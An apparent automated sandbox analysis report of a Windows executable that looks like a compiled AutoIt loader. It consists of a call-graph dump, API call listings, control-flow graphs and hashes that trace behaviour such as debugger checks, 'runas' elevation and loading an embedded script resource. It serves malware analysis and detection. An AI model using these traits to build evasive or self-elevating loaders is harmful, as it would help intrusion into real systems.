100299->100280 100301 420ff6 59 API calls 100300->100301 100302 405c2b 100301->100302 100303 420ff6 59 API calls 100302->100303 100304 405c37 100303->100304 100305 405632 100304->100305 100312 405a2f 100305->100312 100307 405674 100307->100288 100311 40793a 61 API calls 100307->100311 100308 405d20 2 API calls 100309 405643 100308->100309 100309->100307 100309->100308 100319 405bda 100309->100319 100311->100288 100313 405a40 100312->100313 100314 43e065 100312->100314 100313->100309 100328 456443 59 API calls 100314->100328 100316 43e06f 100317 420ff6 59 API calls 100316->100317 100318 43e07b 100317->100318 100320 43e117 100319->100320 100321 405bee 100319->100321 100334 456443 59 API calls 100320->100334 100329 405b19 100321->100329 100324 405bfa 100324->100309 100325 43e122 100326 420ff6 59 API calls 100325->100326 100327 43e137 100326->100327 100328->100316 100330 405b31 100329->100330 100333 405b2a 100329->100333 100331 43e0a7 100330->100331 100332 420ff6 59 API calls 100330->100332 100332->100333 100333->100324 100334->100325 100336 456641 100335->100336 100337 45665e 100335->100337 100336->100337 100339 456621 59 API calls 100336->100339 100337->100254 100339->100336 100340 403633 100341 40366a 100340->100341 100342 4036e5 100341->100342 100343 4036e7 100341->100343 100344 403688 100341->100344 100345 4036ca DefWindowProcW 100342->100345 100346 4036ed 100343->100346 100347 43d31c 100343->100347 100348 403695 100344->100348 100349 40375d PostQuitMessage 100344->100349 100350 4036d8 100345->100350 100351 4036f2 100346->100351 100352 403715 SetTimer RegisterWindowMessageW 100346->100352 100390 4111d0 10 API calls 100347->100390 100353 4036a0 100348->100353 100354 43d38f 100348->100354 100349->100350 100356 4036f9 KillTimer 100351->100356 100357 43d2bf 100351->100357 100352->100350 100358 40373e CreatePopupMenu 100352->100358 100359 403767 100353->100359 100360 4036a8 100353->100360 100394 462a16 71 API calls 100354->100394 100385 4044cb Shell_NotifyIconW 100356->100385 100364 43d2c4 100357->100364 100365 43d2f8 MoveWindow 100357->100365 100358->100350 100388 404531 64 API calls 100359->100388 100367 4036b3 100360->100367 100368 43d374 100360->100368 100362 43d343 100391 4111f3 341 API calls 100362->100391 100373 43d2e7 SetFocus 100364->100373 100374 43d2c8 100364->100374 100365->100350 100371 4036be 100367->100371 100376 40374b 100367->100376 100368->100345 100393 45817e 59 API calls 100368->100393 100369 43d3a1 100369->100345 100369->100350 100371->100345 100392 4044cb Shell_NotifyIconW 100371->100392 100372 40375b 100372->100350 100373->100350 100374->100371 100377 43d2d1 100374->100377 100375 40370c 100386 403114 DeleteObject DestroyWindow 100375->100386 100387 4045df 81 API calls 100376->100387 100389 4111d0 10 API calls 100377->100389 100383 43d368 100384 4043db 68 API calls 100383->100384 100384->100342 100385->100375 100386->100350 100387->100372 100388->100372 100389->100350 100390->100362 100391->100371 100392->100383 100393->100342 100394->100369 100395 10323b0 100409 1030000 100395->100409 100397 103246e 100412 10322a0 100397->100412 100415 10334a0 GetPEB 100409->100415 100411 103068b 100411->100397 100413 10322a9 Sleep 100412->100413 100414 10322b7 100413->100414 100416 10334ca 100415->100416 100416->100411 100417 401055 100422 402649 100417->100422 100420 422f80 67 API calls 100421 401064 100420->100421 100423 4077c7 59 API calls 100422->100423 100424 4026b7 100423->100424 100429 403582 100424->100429 100427 402754 100428 40105a 100427->100428 100432 403416 59 API calls 100427->100432 100428->100420 100433 4035b0 100429->100433 100432->100427 100434 4035bd 100433->100434 100435 4035a1 100433->100435 100434->100435 100436 4035c4 RegOpenKeyExW 100434->100436 100435->100427 100436->100435 100437 4035de RegQueryValueExW 100436->100437 100438 403614 RegCloseKey 100437->100438 100439 4035ff 100437->100439 100438->100435 100439->100438 100440 43ff06 100441 43ff10 100440->100441 100479 40ac90 100440->100479 100539 408e34 59 API calls 100441->100539 100442 420ff6 59 API calls 100442->100479 100449 40b5d5 100451 4081a7 59 API calls 100449->100451 100450 420ff6 59 API calls 100466 40a097 100450->100466 100462 40a1b7 100451->100462 100452 44047f 100543 46a0b5 89 API calls 100452->100543 100453 40b5da 100549 46a0b5 89 API calls 100453->100549 100457 4081a7 59 API calls 100457->100466 100458 407f41 59 API calls 100458->100479 100459 4077c7 59 API calls 100459->100466 100460 457405 59 API calls 100460->100466 100461 44048e 100463 422f80 67 API calls 100463->100466 100465 4566f4 59 API calls 100465->100462 100466->100449 100466->100450 100466->100452 100466->100453 100466->100457 100466->100459 100466->100460 100466->100462 100466->100463 100467 440e00 100466->100467 100470 40a6ba 100466->100470 100533 40ca20 341 API calls 100466->100533 100534 40ba60 60 API calls 100466->100534 100548 46a0b5 89 API calls 100467->100548 100469 47bf80 341 API calls 100469->100479 100547 46a0b5 89 API calls 100470->100547 100471 4566f4 59 API calls 100471->100479 100472 40b416 100538 40f803 341 API calls 100472->100538 100474 40a000 341 API calls 100474->100479 100475 440c94 100545 409df0 59 API calls 100475->100545 100477 440ca2 100546 46a0b5 89 API calls 100477->100546 100479->100442 100479->100458 100479->100462 100479->100466 100479->100469 100479->100471 100479->100472 100479->100474 100479->100475 100479->100477 100481 40b37c 100479->100481 100486 40b685 100479->100486 100489 40ade2 100479->100489 100495 47c5f4 100479->100495 100527 467be0 100479->100527 100540 457405 59 API calls 100479->100540 100541 47c4a7 85 API calls 100479->100541 100480 440c86 100480->100462 100480->100465 100536 409e9c 60 API calls 100481->100536 100483 40b38d 100537 409e9c 60 API calls 100483->100537 100544 46a0b5 89 API calls 100486->100544 100489->100462 100489->100480 100489->100486 100490 4400e0 VariantClear 100489->100490 100491 47e237 130 API calls 100489->100491 100492 46d2e6 101 API calls 100489->100492 100493 412123 95 API calls 100489->100493 100494 47474d 341 API calls 100489->100494 100535 409df0 59 API calls 100489->100535 100542 457405 59 API calls 100489->100542 100490->100489 100491->100489 100492->100489 100493->100489 100494->100489 100496 4077c7 59 API calls 100495->100496 100497 47c608 100496->100497 100498 4077c7 59 API calls 100497->100498 100499 47c610 100498->100499 100500 4077c7 59 API calls 100499->100500 100501 47c618 100500->100501 100502 409997 84 API calls 100501->100502 100504 47c626 100502->100504 100503 47c83c 100503->100479 100504->100503 100505 407a84 59 API calls 100504->100505 100506 407d2c 59 API calls 100504->100506 100507 47c80f 100504->100507 100509 47c7f6 100504->100509 100511 47c811 100504->100511 100514 4081a7 59 API calls 100504->100514 100515 407faf 59 API calls 100504->100515 100520 407faf 59 API calls 100504->100520 100524 409997 84 API calls 100504->100524 100525 407c8e 59 API calls 100504->100525 100526 407e0b 59 API calls 100504->100526 100505->100504 100506->100504 100507->100503 100552 409b9c 59 API calls 100507->100552 100510 407e0b 59 API calls 100509->100510 100512 47c803 100510->100512 100513 407e0b 59 API calls 100511->100513 100516 407c8e 59 API calls 100512->100516 100517 47c820 100513->100517 100514->100504 100518 47c6bd CharUpperBuffW 100515->100518 100516->100507 100519 407c8e 59 API calls 100517->100519 100550 40859a 68 API calls 100518->100550 100519->100507 100522 47c77d CharUpperBuffW 100520->100522 100551 40c707 69 API calls 100522->100551 100524->100504 100525->100504 100526->100504 100528 467bec 100527->100528 100529 420ff6 59 API calls 100528->100529 100530 467bfa 100529->100530 100531 467c08 100530->100531 100532 4077c7 59 API calls 100530->100532 100531->100479 100532->100531 100533->100466 100534->100466 100535->100489 100536->100483 100537->100472 100538->100486 100539->100479 100540->100479 100541->100479 100542->100489 100543->100461 100544->100480 100545->100480 100546->100480 100547->100462 100548->100453 100549->100462 100550->100504 100551->100504 100552->100503 100553 401066 100558 40f8cf 100553->100558 100555 40106c 100556 422f80 67 API calls 100555->100556 100557 401076 100556->100557 100559 40f8f0 100558->100559 100591 420143 100559->100591 100563 40f937 100564 4077c7 59 API calls 100563->100564 100565 40f941 100564->100565 100566 4077c7 59 API calls 100565->100566 100567 40f94b 100566->100567 100568 4077c7 59 API calls 100567->100568 100569 40f955 100568->100569 100570 4077c7 59 API calls 100569->100570 100571 40f993 100570->100571 100572 4077c7 59 API calls 100571->100572 100573 40fa5e 100572->100573 100601 4160e7 100573->100601 100577 40fa90 100578 4077c7 59 API calls 100577->100578 100579 40fa9a 100578->100579 100629 41ffde 100579->100629 100581 40fae1 100582 40faf1 GetStdHandle 100581->100582 100583 4449d5 100582->100583 100584 40fb3d 100582->100584 100583->100584 100586 4449de 100583->100586 100585 40fb45 OleInitialize 100584->100585 100585->100555 100636 466dda 64 API calls 100586->100636 100588 4449e5 100637 4674a9 CreateThread 100588->100637 100590 4449f1 CloseHandle 100590->100585 100638 42021c 100591->100638 100594 42021c 59 API calls 100595 420185 100594->100595 100596 4077c7 59 API calls 100595->100596 100597 420191 100596->100597 100598 407d2c 59 API calls 100597->100598 100599 40f8f6 100598->100599 100600 4203a2 6 API calls 100599->100600 100600->100563 100602 4077c7 59 API calls 100601->100602 100603 4160f7 100602->100603 100604 4077c7 59 API calls 100603->100604 100605 4160ff 100604->100605 100645 415bfd 100605->100645 100608 415bfd 59 API calls 100609 41610f 100608->100609 100610 4077c7 59 API calls 100609->100610 100611 41611a 100610->100611 100612 420ff6 59 API calls 100611->100612 100613 40fa68 100612->100613 100614 416259 100613->100614 100615 416267 100614->100615 100616 4077c7 59 API calls 100615->100616 100617 416272 100616->100617 100618 4077c7 59 API calls 100617->100618 100619 41627d 100618->100619 100620 4077c7 59 API calls 100619->100620 100621 416288 100620->100621 100622 4077c7 59 API calls 100621->100622 100623 416293 100622->100623 100624 415bfd 59 API calls 100623->100624 100625 41629e 100624->100625 100626 420ff6 59 API calls 100625->100626 100627 4162a5 RegisterWindowMessageW 100626->100627 100627->100577 100630 455cc3 100629->100630 100631 41ffee 100629->100631 100648 469d71 60 API calls 100630->100648 100632 420ff6 59 API calls 100631->100632 100635 41fff6 100632->100635 100634 455cce 100635->100581 100636->100588 100637->100590 100649 46748f 65 API calls 100637->100649 100639 4077c7 59 API calls 100638->100639 100640 420227 100639->100640 100641 4077c7 59 API calls 100640->100641 100642 42022f 100641->100642 100643 4077c7 59 API calls 100642->100643 100644 42017b 100643->100644 100644->100594 100646 4077c7 59 API calls 100645->100646 100647 415c05 100646->100647 100647->100608 100648->100634 100650 401016 100655 404ad2 100650->100655 100653 422f80 67 API calls 100654 401025 100653->100654 100656 420ff6 59 API calls 100655->100656 100657 404ada 100656->100657 100659 40101b 100657->100659 100662 404a94 100657->100662 100659->100653 100663 404aaf 100662->100663 100664 404a9d 100662->100664 100666 404afe 100663->100666 100665 422f80 67 API calls 100664->100665 100665->100663 100667 4077c7 59 API calls 100666->100667 100668 404b16 GetVersionExW 100667->100668 100669 407d2c 59 API calls 100668->100669 100670 404b59 100669->100670 100671 407e8c 59 API calls 100670->100671 100680 404b86 100670->100680 100672 404b7a 100671->100672 100673 407886 59 API calls 100672->100673 100673->100680 100674 404bf1 GetCurrentProcess IsWow64Process 100675 404c0a 100674->100675 100677 404c20 100675->100677 100678 404c89 GetSystemInfo 100675->100678 100676 43dc8d 100690 404c95 100677->100690 100679 404c56 100678->100679 100679->100659 100680->100674 100680->100676 100683 404c32 100686 404c95 2 API calls 100683->100686 100684 404c7d GetSystemInfo 100685 404c47 100684->100685 100685->100679 100687 404c4d FreeLibrary 100685->100687 100688 404c3a GetNativeSystemInfo 100686->100688 100687->100679 100688->100685 100691 404c2e 100690->100691 100692 404c9e LoadLibraryA 100690->100692 100691->100683 100691->100684 100692->100691 100693 404caf GetProcAddress 100692->100693 100693->100691 100694 40568a 100695 405c18 59 API calls 100694->100695 100696 40569c 100695->100696 100697 405632 61 API calls 100696->100697 100698 4056aa 100697->100698 100699 4056ba 100698->100699 100701 4081c1 61 API calls 100698->100701 100701->100699 100702 40e70b 100705 40d260 100702->100705 100704 40e719 100706 40d4dd 100705->100706 100707 40d27d 100705->100707 100721 40d6ab 100706->100721 100754 46a0b5 89 API calls 100706->100754 100708 442b0a 100707->100708 100709 442abb 100707->100709 100714 40d2a4 100707->100714 100749 47a6fb 341 API calls 100708->100749 100712 442abe 100709->100712 100719 442ad9 100709->100719 100713 442aca 100712->100713 100712->100714 100747 47ad0f 341 API calls 100713->100747 100714->100706 100716 422f80 67 API calls 100714->100716 100720 40d594 100714->100720 100714->100721 100726 442c26 100714->100726 100730 408620 69 API calls 100714->100730 100736 40a000 341 API calls 100714->100736 100737 4081a7 59 API calls 100714->100737 100739 4088a0 68 API calls 100714->100739 100740 4086a2 68 API calls 100714->100740 100742 40859a 68 API calls 100714->100742 100743 40d0dc 341 API calls 100714->100743 100744 409f3a 59 API calls 100714->100744 100745 40d060 89 API calls 100714->100745 100746 40cedd 341 API calls 100714->100746 100750 408bb2 68 API calls 100714->100750 100751 409e9c 60 API calls 100714->100751 100752 456d03 60 API calls 100714->100752 100716->100714 100718 442cdf 100718->100718 100719->100706 100748 47b1b7 341 API calls 100719->100748 100741 408bb2 68 API calls 100720->100741 100721->100704 100725 40d5a3 100725->100704 100753 47aa66 89 API calls 100726->100753 100730->100714 100736->100714 100737->100714 100739->100714 100740->100714 100741->100725 100742->100714 100743->100714 100744->100714 100745->100714 100746->100714 100747->100721 100748->100706 100749->100714 100750->100714 100751->100714 100752->100714 100753->100706 100754->100718 100755 40107d 100760 4071eb 100755->100760 100757 40108c 100758 422f80 67 API calls 100757->100758 100759 401096 100758->100759 100761 4071fb 100760->100761 100762 4077c7 59 API calls 100761->100762 100763 4072b1 100762->100763 100764 404864 61 API calls 100763->100764 100765 4072ba 100764->100765 100791 42074f 100765->100791 100768 407e0b 59 API calls 100769 4072d3 100768->100769 100770 403f84 59 API calls 100769->100770 100771 4072e2 100770->100771 100772 4077c7 59 API calls 100771->100772 100773 4072eb 100772->100773 100774 407eec 59 API calls 100773->100774 100775 4072f4 RegOpenKeyExW 100774->100775 100776 43ecda RegQueryValueExW 100775->100776 100780 407316 100775->100780 100777 43ecf7 100776->100777 100778 43ed6c RegCloseKey 100776->100778 100779 420ff6 59 API calls 100777->100779 100778->100780 100790 43ed7e 100778->100790 100781 43ed10 100779->100781 100780->100757 100782 40538e 59 API calls 100781->100782 100783 43ed1b RegQueryValueExW 100782->100783 100784 43ed38 100783->100784 100786 43ed52 100783->100786 100785 407d2c 59 API calls 100784->100785 100785->100786 100786->100778 100787 407b52 59 API calls 100787->100790 100788 407f41 59 API calls 100788->100790 100789 403f84 59 API calls 100789->100790 100790->100780 100790->100787 100790->100788 100790->100789 100792 431b90 100791->100792 100793 42075c GetFullPathNameW 100792->100793 100794 42077e 100793->100794 100795 407d2c 59 API calls 100794->100795 100796 4072c5 100795->100796 100796->100768

                                                              Executed Functions

                                                              Function 00403B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B7A
                                                              • IsDebuggerPresent.KERNEL32 ref: 00403B8C
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C62F8,004C62E0,?,?), ref: 00403BFD
                                                                • Part of subcall function 00410A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C26,004C62F8,?,?,?), ref: 00410ACE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C81
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B93F0,00000010), ref: 0043D4BC
                                                              • SetCurrentDirectoryW.KERNEL32(?,004C62F8,?,?,?), ref: 0043D4F4
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B5D40,004C62F8,?,?,?), ref: 0043D57A
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D581
                                                                • Part of subcall function 00403A58: GetSysColorBrush.USER32(0000000F), ref: 00403A62
                                                                • Part of subcall function 00403A58: LoadCursorW.USER32(00000000,00007F00), ref: 00403A71
                                                                • Part of subcall function 00403A58: LoadIconW.USER32(00000063), ref: 00403A88
                                                                • Part of subcall function 00403A58: LoadIconW.USER32(000000A4), ref: 00403A9A
                                                                • Part of subcall function 00403A58: LoadIconW.USER32(000000A2), ref: 00403AAC
                                                                • Part of subcall function 00403A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AD2
                                                                • Part of subcall function 00403A58: RegisterClassExW.USER32(?), ref: 00403B28
                                                                • Part of subcall function 004039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A15
                                                                • Part of subcall function 004039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A36
                                                                • Part of subcall function 004039E7: ShowWindow.USER32(00000000,?,?), ref: 00403A4A
                                                                • Part of subcall function 004039E7: ShowWindow.USER32(00000000,?,?), ref: 00403A53
                                                                • Part of subcall function 004043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004044A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                              • API String ID: 1385234928-2806069697
                                                              • Opcode ID: 1ef8420d7069191806342d94a18f46b7946fa95cf218c5e93081cfc8bbc94521
                                                              • Instruction ID: 0f2c37a458a75ddd4165d4490fb1e043a1c32b8e6bc4467291d23e22a2595f58
                                                              • Opcode Fuzzy Hash: 1ef8420d7069191806342d94a18f46b7946fa95cf218c5e93081cfc8bbc94521
                                                              • Instruction Fuzzy Hash: F351B575D08248AADB11AFB5DC05EEE7B78AB45304B1081BFF811B21E1DA7C5645CB2E
                                                              Function 0042DBB5 Relevance: 18.5, APIs: 12, Instructions: 548COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 593 42dbb5-42dbf4 call 431b90 596 42dbf6-42dbf8 593->596 597 42dbfd-42dbff 593->597 598 42e40a-42e419 call 42c836 596->598 599 42dc20-42dc4c 597->599 600 42dc01-42dc1b call 428d34 call 428d68 call 428ff6 597->600 603 42dc53-42dc5a 599->603 604 42dc4e-42dc51 599->604 600->598 608 42dc78 603->608 609 42dc5c-42dc73 call 428d34 call 428d68 call 428ff6 603->609 604->603 607 42dc7e-42dc83 604->607 611 42dc94-42dca2 call 435ebb 607->611 612 42dc85-42dc91 call 431b11 607->612 608->607 639 42e400-42e403 609->639 624 42dff8-42e010 611->624 625 42dca8-42dcc0 611->625 612->611 628 42e016-42e026 624->628 629 42e38b-42e3a8 WriteFile 624->629 625->624 627 42dcc6-42dd04 call 429bec GetConsoleMode 625->627 627->624 650 42dd0a-42dd10 627->650 632 42e13a-42e13f 628->632 633 42e02c-42e037 628->633 634 42dfeb-42dff3 GetLastError 629->634 635 42e3ae-42e3b6 629->635 640 42e145-42e148 632->640 641 42e22f-42e23a 632->641 636 42e3ca-42e3e2 633->636 637 42e03d-42e04d 633->637 638 42e102 634->638 635->638 645 42e3e4-42e3e7 636->645 646 42e3ed-42e3fd call 428d68 call 428d34 636->646 643 42e053-42e055 637->643 647 42e108-42e10a 638->647 648 42e409 639->648 640->636 644 42e14e 640->644 641->636 649 42e240 641->649 654 42e057-42e070 643->654 655 42e09b-42e0d2 WriteFile 643->655 656 42e158-42e171 644->656 645->646 657 42e3e9-42e3eb 645->657 646->639 659 42e110-42e112 647->659 660 42e405-42e407 647->660 648->598 651 42e24a-42e25f 649->651 652 42dd12-42dd14 650->652 653 42dd1a-42dd43 GetConsoleCP 650->653 661 42e265-42e267 651->661 652->624 652->653 653->636 662 42dd49-42dd57 653->662 663 42e072-42e07c 654->663 664 42e07d-42e099 654->664 655->634 665 42e0d8-42e0e4 655->665 666 42e172-42e175 656->666 657->648 668 42e3c4 659->668 669 42e118-42e11d 659->669 660->648 670 42e2a4-42e2e5 WideCharToMultiByte 661->670 671 42e269-42e27f 661->671 672 42dd61-42dd69 662->672 663->664 664->643 664->655 673 42e0e6-42e0f6 665->673 674 42e0fc 665->674 675 42e177-42e187 666->675 676 42e1aa-42e1f3 WriteFile 666->676 668->636 678 42e123-42e135 call 428d68 call 428d34 669->678 679 42e3bb-42e3c2 call 428d47 669->679 670->634 685 42e2eb-42e2ed 670->685 681 42e293-42e2a2 671->681 682 42e281-42e290 671->682 683 42dd6f-42dd9c 672->683 684 42df1d-42df20 672->684 673->637 673->674 674->638 686 42e199-42e1a8 675->686 687 42e189-42e196 675->687 676->634 688 42e1f9-42e20b 676->688 678->639 679->639 681->661 681->670 682->681 692 42ddba-42ddc6 call 423835 683->692 693 42dd9e-42ddb8 683->693 695 42df22-42df25 684->695 696 42df27-42df54 684->696 694 42e2f3-42e326 WriteFile 685->694 686->666 686->676 687->686 688->638 697 42e211-42e224 688->697 716 42ddc8-42dddc 692->716 717 42de0c-42de0e 692->717 700 42de14-42de26 call 43650a 693->700 702 42e346-42e35a GetLastError 694->702 703 42e328-42e342 694->703 695->696 704 42df5a-42df5d 695->704 696->704 697->656 705 42e22a 697->705 700->638 719 42de2c 700->719 710 42e360-42e362 702->710 703->694 709 42e344 703->709 711 42df64-42df74 call 437cae 704->711 712 42df5f-42df62 704->712 705->638 709->710 710->638 718 42e368-42e380 710->718 711->634 726 42df76-42df7f 711->726 712->711 713 42dfaf-42dfb2 712->713 713->672 721 42dfb8 713->721 722 42dde2-42ddf7 call 43650a 716->722 723 42dfbd-42dfe6 716->723 717->700 718->651 724 42e386 718->724 725 42de32-42de67 WideCharToMultiByte 719->725 721->638 722->638 734 42ddfd-42de0a 722->734 723->638 724->638 725->638 728 42de6d-42de99 WriteFile 725->728 729 42dfa3-42dfa9 726->729 730 42df81-42df9a call 437cae 726->730 728->634 732 42de9f-42deb9 728->732 729->713 730->634 739 42df9c-42df9d 730->739 732->647 735 42debf-42dec5 732->735 734->725 737 42df12-42df18 735->737 738 42dec7-42def8 WriteFile 735->738 737->729 738->634 740 42defe-42df05 738->740 739->729 740->638 741 42df0b-42df11 740->741 741->737
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b95aab6f174b6631bd9fbfb9a50bbfcda543df44edc3c6637ec930a2cbdb34e
                                                              • Instruction ID: d62d24140ea0e0ec6d287f47ef26bb689d81bbfa3dc41fa89b9a1f9a2f24fac5
                                                              • Opcode Fuzzy Hash: 6b95aab6f174b6631bd9fbfb9a50bbfcda543df44edc3c6637ec930a2cbdb34e
                                                              • Instruction Fuzzy Hash: 5B327275B021388FCB24CF15ED85AEAB7B5FB46314F4441EAE40A97A81C7349E81CF5A
                                                              Function 00404FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1355 404fe9-405001 CreateStreamOnHGlobal 1356 405021-405026 1355->1356 1357 405003-40501a FindResourceExW 1355->1357 1358 405020 1357->1358 1359 43dd5c-43dd6b LoadResource 1357->1359 1358->1356 1359->1358 1360 43dd71-43dd7f SizeofResource 1359->1360 1360->1358 1361 43dd85-43dd90 LockResource 1360->1361 1361->1358 1362 43dd96-43dd9e 1361->1362 1363 43dda2-43ddb4 1362->1363 1363->1358
                                                              APIs
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00404EEE,?,?,00000000,00000000), ref: 00404FF9
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404EEE,?,?,00000000,00000000), ref: 00405010
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00404EEE,?,?,00000000,00000000,?,?,?,?,?,?,00404F8F), ref: 0043DD60
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00404EEE,?,?,00000000,00000000,?,?,?,?,?,?,00404F8F), ref: 0043DD75
                                                              • LockResource.KERNEL32(N@,?,?,00404EEE,?,?,00000000,00000000,?,?,?,?,?,?,00404F8F,00000000), ref: 0043DD88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT$N@
                                                              • API String ID: 3051347437-2499734412
                                                              • Opcode ID: 5ec92892c76f8d1a0b25561ef3fd13e1900f32b078569a65020aaf11a3c9a4ea
                                                              • Instruction ID: 67856c902de3f53bc3f8eb18af461e19ea0094fb9f07ee8290f0089f1c16aac3
                                                              • Opcode Fuzzy Hash: 5ec92892c76f8d1a0b25561ef3fd13e1900f32b078569a65020aaf11a3c9a4ea
                                                              • Instruction Fuzzy Hash: 33115A75200700AFD7218B65EC58F6B7BB9EBC9B11F20457DF406D62A0DB72E8048A69
                                                              Function 00404AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1419 404afe-404b5e call 4077c7 GetVersionExW call 407d2c 1424 404b64 1419->1424 1425 404c69-404c6b 1419->1425 1427 404b67-404b6c 1424->1427 1426 43db90-43db9c 1425->1426 1428 43db9d-43dba1 1426->1428 1429 404c70-404c71 1427->1429 1430 404b72 1427->1430 1432 43dba3 1428->1432 1433 43dba4-43dbb0 1428->1433 1431 404b73-404baa call 407e8c call 407886 1429->1431 1430->1431 1441 404bb0-404bb1 1431->1441 1442 43dc8d-43dc90 1431->1442 1432->1433 1433->1428 1435 43dbb2-43dbb7 1433->1435 1435->1427 1437 43dbbd-43dbc4 1435->1437 1437->1426 1439 43dbc6 1437->1439 1443 43dbcb-43dbce 1439->1443 1441->1443 1444 404bb7-404bc2 1441->1444 1445 43dc92 1442->1445 1446 43dca9-43dcad 1442->1446 1447 404bf1-404c08 GetCurrentProcess IsWow64Process 1443->1447 1448 43dbd4-43dbf2 1443->1448 1449 43dc13-43dc19 1444->1449 1450 404bc8-404bca 1444->1450 1451 43dc95 1445->1451 1453 43dc98-43dca1 1446->1453 1454 43dcaf-43dcb8 1446->1454 1455 404c0a 1447->1455 1456 404c0d-404c1e 1447->1456 1448->1447 1452 43dbf8-43dbfe 1448->1452 1461 43dc23-43dc29 1449->1461 1462 43dc1b-43dc1e 1449->1462 1457 404bd0-404bd3 1450->1457 1458 43dc2e-43dc3a 1450->1458 1451->1453 1459 43dc00-43dc03 1452->1459 1460 43dc08-43dc0e 1452->1460 1453->1446 1454->1451 1463 43dcba-43dcbd 1454->1463 1455->1456 1464 404c20-404c30 call 404c95 1456->1464 1465 404c89-404c93 GetSystemInfo 1456->1465 1466 43dc5a-43dc5d 1457->1466 1467 404bd9-404be8 1457->1467 1469 43dc44-43dc4a 1458->1469 1470 43dc3c-43dc3f 1458->1470 1459->1447 1460->1447 1461->1447 1462->1447 1463->1453 1476 404c32-404c3f call 404c95 1464->1476 1477 404c7d-404c87 GetSystemInfo 1464->1477 1468 404c56-404c66 1465->1468 1466->1447 1475 43dc63-43dc78 1466->1475 1472 43dc4f-43dc55 1467->1472 1473 404bee 1467->1473 1469->1447 1470->1447 1472->1447 1473->1447 1478 43dc82-43dc88 1475->1478 1479 43dc7a-43dc7d 1475->1479 1484 404c41-404c45 GetNativeSystemInfo 1476->1484 1485 404c76-404c7b 1476->1485 1480 404c47-404c4b 1477->1480 1478->1447 1479->1447 1480->1468 1482 404c4d-404c50 FreeLibrary 1480->1482 1482->1468 1484->1480 1485->1484
                                                              APIs
